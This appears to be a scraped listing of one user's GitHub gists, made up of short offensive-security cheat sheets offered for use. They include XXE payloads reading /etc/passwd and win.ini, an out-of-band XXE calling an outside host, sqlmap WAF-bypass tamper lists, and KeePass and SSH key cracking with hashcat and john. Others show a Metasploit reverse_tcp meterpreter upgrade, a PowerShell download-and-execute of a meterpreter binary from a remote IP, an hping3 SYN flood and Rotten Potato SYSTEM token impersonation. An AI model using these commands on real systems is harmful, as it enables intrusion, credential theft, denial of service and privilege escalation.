@castexyz
castexyz / basic xxe & xee payloads
Last active March 20, 2022 19:16
XXE and XEE basic
--------------------------------
Basic XXE
--------------------------------
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"> ]>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
--------------------------------
Basic XEE
--------------------------------
<!DOCTYPE data [
@castexyz
castexyz / sqlmapTamperScripts.md
Last active January 30, 2024 04:57
Sqlmap TamperScripts

SQLMAP Tamper Scripts

credits: https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3

General Tamper testing:

tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

MSSQL:

tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

@castexyz
castexyz / Crunch
Last active January 19, 2018 14:54
Crunch
crunch 8 8 -t @@@@1980 -o /root/Desktop/wordlist.txt
@ will insert lower case characters
, will insert upper case characters
% will insert numbers
^ will insert symbols
@castexyz
castexyz / hashcatKeepass
Last active January 19, 2018 14:48
Hashcat Keepass
./keepass2john CrackThis.kdb > CrackThis.hash
The hashcat binary does not expect the name of our KeePass database to be prepended to our hash,
so we will have to trim the string with a text editor.
hashcat --help | grep -i "KeePass"
-m 13400 => KeePass Hash Provided
-a 0 => Dictionary Attack
-w 1 => Low Latency Desktop Profile
@castexyz
castexyz / Crack ssh priv key
Created February 24, 2018 13:13
Crack ssh priv key
ssh2john priv.key > privjohn
john privjohn --wordlist='/usr/share/wordlists/rockyou.txt'
@castexyz
castexyz / Upgrade to meterpreter
Last active March 11, 2018 11:56
Upgrade to meterpreter
WEBSHELL TO METERPRETER
use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 1
msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.0.104
msf exploit(web_delivery) > set srvport 8081
msf exploit(web_delivery) > exploit
SSH TO METERPRETER
use auxiliary/scanner/ssh/ssh_login_pubkey
@castexyz
castexyz / Hping3 flood
Last active March 6, 2018 12:12
Hping3 flood
hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source <target>
@castexyz
castexyz / Powershell download and execute
Created March 18, 2018 10:07
Powershell download and execute
cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://10.10.14.5:8000/windows-meterpreter-staged-reverse-tcp-9877.exe','mess.exe');Start-Process 'mess.exe'
@castexyz
castexyz / Rotten potato
Created March 18, 2018 15:32
Rotten potato
load incognito
execute -f rottenpotato.exe -Hc
impersonate_token "NT Authority\\SYSTEM"
@castexyz
castexyz / XXE_payloads
Created August 2, 2018 09:32 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>